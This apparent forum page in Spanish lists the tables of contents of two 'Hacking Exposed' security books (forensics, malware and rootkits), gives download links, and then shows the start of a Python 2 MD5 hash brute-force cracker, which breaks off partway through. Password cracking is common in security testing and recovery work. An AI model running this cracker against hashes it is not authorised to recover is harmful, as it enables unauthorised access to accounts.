00-FM.indd xvi 8/23/2009 3:54:44 AM
Contents xvii
▼ 18 Employee Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
What Is Employee Fraud? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Monetary Loss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Investigations by Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Criminal Penalties and Civil Lawsuits . . . . . . . . . . . . . . . . . . . . . . . . . 420
Types of Employee Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
Asset Misappropriation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
Corruption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
What Is the Story? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
Estimating Losses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Working with Higher-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Working with Outside Counsel and Investigators . . . . . . . . . . . . . . . 434
▼ 19 Corporate Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
What Is Corporate Fraud? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
Impact to Shareholders and the Public . . . . . . . . . . . . . . . . . . . . . . . . . 437
Regulatory Changes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Investigations and Litigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
Types of Corporate Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
Accounting Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
Securities Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444
▼ 20 Organized Cyber Crime . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 453
The Changing Landscape of Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454
The Russian Business Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Infrastructure and Bot-Nets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
The Russian-Estonian Confl ict . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 456
Effects on Western Companies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 456
Types of Hacks and the Role of Computer Forensics . . . . . . . . . . . . . . . . . . . 457
Bot/Remote Control Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457
Traditional Hacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 463
Money Laundering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
Anti-Money Laundering Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
The Mechanics of Laundering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
The Role of Computer Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467
▼ 21 Consumer Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
What Is Consumer Fraud? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
Impact to Consumers and the Public . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Regulatory Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Investigations and Litigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
00-FM.indd xvii 8/23/2009 3:54:44 AM
xviii Hacking Exposed Computer Forensics
Types of Consumer Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Identity Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Investment Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
Mortgage Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491
▼ A Searching Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
Regular Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
Theory and History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
The Building Blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
Constructing Regular Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
▼ Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
https://jumpshare.com/v/ZOdcHOnjdR2TpcS0hE7l
1 Method of Infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
This Security Stuff Might Actually Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Decrease in Operating System Vulnerabilities . . . . . . . . . . . . . . . . . . . 9
Perimeter Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Why They Want Your Workstation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Intent Is Hard to Detect . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
It's a Business . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Signifi cant Malware Propagation Techniques . . . . . . . . . . . . . . . . . . . . . . . . . 14
Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
File Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Modern Malware Propagation Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
StormWorm (Malware Sample: trojan.peacomm) . . . . . . . . . . . . . . . . 22
Metamorphism (Malware Sample: W32.Evol, W32.Simile) . . . . . . . . 24
Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Dynamic Domain Name Services (Malware Sample:
W32.Reatle.E@mm) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
Fast Flux (Malware Sample: trojan.peacomm) . . . . . . . . . . . . . . . . . . . 29
Malware Propagation Injection Vectors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Malicious Websites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Phishing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Peer-To-Peer (P2P) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Worms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
x Hacking Exposed Malware & Rootkits
Samples from the Companion Website . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
▼ 2 Malware Functionality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
What Malware Does Once It's Installed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Pop-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Search Engine Redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Data Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Click Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Identity Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Keylogging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
Malware Behaviors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Identifying Installed Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Typical Install Locations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Installing on Local Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Modifying Timestamps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Affecting Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Disabling Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
Modifying the Windows Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Part II Rootkits
Case Study: The Invisible Rootkit That Steals Your Bank Account Data . . . 82
Disk Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Firewall Bypassing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Backdoor Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Intent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
▼ 3 User-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Maintain Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Network-Based Backdoors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Stealth: Conceal Existence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Types of Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Timeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
User-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
What Are User-Mode Rootkits? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Background Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
Injection Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
Hooking Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
User-Mode Rootkit Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Contents xi
▼ 4 Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Ground Level: x86 Architecture Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
Instruction Set Architectures and the Operating System . . . . . . . . . . 121
Protection Rings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Bridging the Rings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Kernel Mode: The Digital Wild West . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
The Target: Windows Kernel Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
The Win32 Subsystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
What Are These APIs Anyway? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
The Concierge: NTDLL.DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
Functionality by Committee: The Windows Executive
(NTOSKRNL.EXE) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
The Windows Kernel (NTOSKRNL.EXE) . . . . . . . . . . . . . . . . . . . . . . . 127
Device Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
The Windows Hardware Abstraction Layer (HAL) . . . . . . . . . . . . . . 128
Kernel Driver Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Kernel-Mode Driver Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Gross Anatomy: A Skeleton Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
WDF, KMDF, and UMDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
What Are Kernel-Mode Rootkits? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Challenges Faced by Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . 134
Getting Loaded . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
Gaining Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
Communicating with User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
Remaining Stealthy and Persistent . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Methods and Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Kernel-Mode Rootkit Samples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Klog by Clandestiny . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
AFX by Aphex . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
FU and FUTo by Jamie Butler, Peter Silberman, and C.H.A.O.S . . . . 162
Shadow Walker by Sherri Sparks and Jamie Butler . . . . . . . . . . . . . . 164
He4Hook by He4 Team . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
Sebek by The Honeynet Project . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Summary of Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
▼ 5 Virtual Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Overview of Virtual Machine Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Types of Virtual Machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
The Hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Virtualization Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Virtual Memory Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Virtual Machine Isolation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
xii Hacking Exposed Malware & Rootkits
Virtual Machine Rootkit Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Rootkits in the Matrix: How Did We Get Here?! . . . . . . . . . . . . . . . . . 179
What Is a Virtual Rootkit? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Types of Virtual Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Detecting the Virtual Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Escaping the Virtual Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Hijacking the Hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Virtual Rootkit Samples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
▼ 6 The Future of Rootkits: If You Think It's Bad Now... . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Increases in Complexity and Stealth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200
Custom Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208
Part III Prevention Technologies
Case Study: A Wolf in Sheep's Clothing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Rogue Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Great Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
They Work! Sometimes... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
▼ 7 Antivirus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
Now and Then: The Evolution of Antivirus Technology . . . . . . . . . . . . . . . . 216
The Virus Landscape . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Defi nition of a Virus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Classifi cation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Simple Viruses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220
Complex Viruses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
Antivirus—Core Features and Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Manual or "On-Demand" Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Real-Time or "On-Access" Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . 225
Signature-Based Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225
Anomaly/Heuristic-Based Detection . . . . . . . . . . . . . . . . . . . . . . . . . . 227
A Critical Look at the Role of Antivirus Technology . . . . . . . . . . . . . . . . . . . 228
Where Antivirus Excels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228
Top Performers in the Antivirus Industry . . . . . . . . . . . . . . . . . . . . . . 229
Challenges for Antivirus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Antivirus Exposed: Is Your Antivirus Product a Rootkit? . . . . . . . . . . . . . . . 238
Patching System Services at Runtime . . . . . . . . . . . . . . . . . . . . . . . . . . 239
Hiding Threads from User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
A Bug? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
The Future of the Antivirus Industry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Fighting for Survival . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Contents xiii
Death of an Industry? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Possible Antivirus Replacement Technologies . . . . . . . . . . . . . . . . . . . 245
Summary and Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
▼ 8 Host Protection Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Personal Firewall Capabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 250
McAfee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251
Symantec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252
Checkpoint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Personal Firewall Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Pop-Up Blockers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
Internet Explorer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
Firefox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Opera . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Safari . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Chrome . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
Example Generic Pop-Up Blocker Code . . . . . . . . . . . . . . . . . . . . . . . . 261
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
▼ 9 Host-Based Intrusion Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
HIPS Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Growing Past Intrusion Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
Behavioral vs. Signature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
Behavioral Based . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Signature Based . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Anti-Detection Evasion Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
How Do You Detect Intent? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
HIPS and the Future of Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
▼ 10 Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
The Rootkit Author's Paradox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
A Quick History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
Details on Detection Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
System Service Descriptor Table Hooking . . . . . . . . . . . . . . . . . . . . . . 288
IRP Hooking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
Inline Hooking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Interrupt Descriptor Table Hooks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Direct Kernel Object Manipulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
IAT Hooking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Windows Anti-Rootkit Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Software-Based Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
Live Detection vs. Offl ine Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
System Virginity Verifi er . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
IceSword and DarkSpy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
xiv Hacking Exposed Malware & Rootkits
RootkitRevealer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
F-Secure's Blacklight . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
Rootkit Unhooker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
GMER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Helios and Helios Lite . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302
McAfee Rootkit Detective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
Commercial Rootkit Detection Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Offl ine Detection Using Memory Analysis: The Evolution of Memory
Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307
Virtual Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Hardware-Based Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
▼ 11 General Security Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319
End-User Education . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 320
Security Awareness Training Programs . . . . . . . . . . . . . . . . . . . . . . . . 320
Defense in Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
System Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Automatic Updates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
Baked-In Security (from the Beginning) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327
▼ Appendix System Integrity Analysis: Building Your Own Rootkit Detector . . . . . . . . . . . . . . . . . . 329
What Is System Integrity Analysis? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
The Two Ps of Integrity Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
Pointer Validation: Detecting SSDT Hooks . . . . . . . . . . . . . . . . . . . . . 335
Patch/Detour Detection in the SSDT . . . . . . . . . . . . . . . . . . . . . . . . . . 340
The Two Ps for Detecting IRP Hooks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
The Two Ps for Detecting IAT Hooks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
Our Third Technique: Detecting DKOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
Sample Rootkit Detection Utility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
https://jumpshare.com/v/FzyTukYsWV5YHUHPxNAxNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Gracias, aunque no pedía esto, pedía el código completo.
# PyCrack MD5 Hash Cracker
# Version 1.0.0
# Coded by BlackMan in Python 2.7.5
# Download : http://sourceforge.net/projects/md5crack/
# File : pycrack.py
#IMPORTS
import hashlib
import os
import sys
import datetime
#GLOBAL
startTime = datetime.datetime.now()
#DEBUG MESSAGES
def action(msg) : print '[#] - ' + msg
def alert(msg) : print '[+] - ' + msg
def error(msg) : print '[!] - ' + msg
def errorExit(msg) : raise SystemExit('[!] - ' + msg)
#MD5 STRING
def md5(string): return hashlib.md5(string).hexdigest()
#PERMUTATION BUILDER
def xpermutation(characters, size):
if size == 0:
yield []
else:
for x in xrange(len(characters)):
for y in xpermutation(characters[:x] + characters[x:], size - 1):
yield [characters[x]] + y
#BRUTE FORCE
def bruteForce(hash):
attempt = 0
characters = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
maxLength = xrange(0,25)
stringBuilder = ''
for length in maxLength:
for x in xpermutation(characters, length):
permutation = stringBuilder + ''.join(x)
attempt = attempt + 1
if md5(permutation) == hash:
end_time = str(datetime.datetime.now() - startTime).split('.')[0]
print '[' + str(attempt) + '] - ' + permutation + ' - CRACKED! Took ' + end_time
raw_input('\nPress the <ENTER> key to EXIT...')
sys.exit()
else:
print '[' + str(attempt) + '] - ' + permutation
errorExit('Failed to brute force hash.')
#START
if os.name == 'nt' : os.system('cls')
else : os.system('clear')
print ''.rjust(56, '#')
print '#' + ''.center(54) + '#'
print '# PyCrack MD5 Hash Cracker'.ljust(55) + '#'
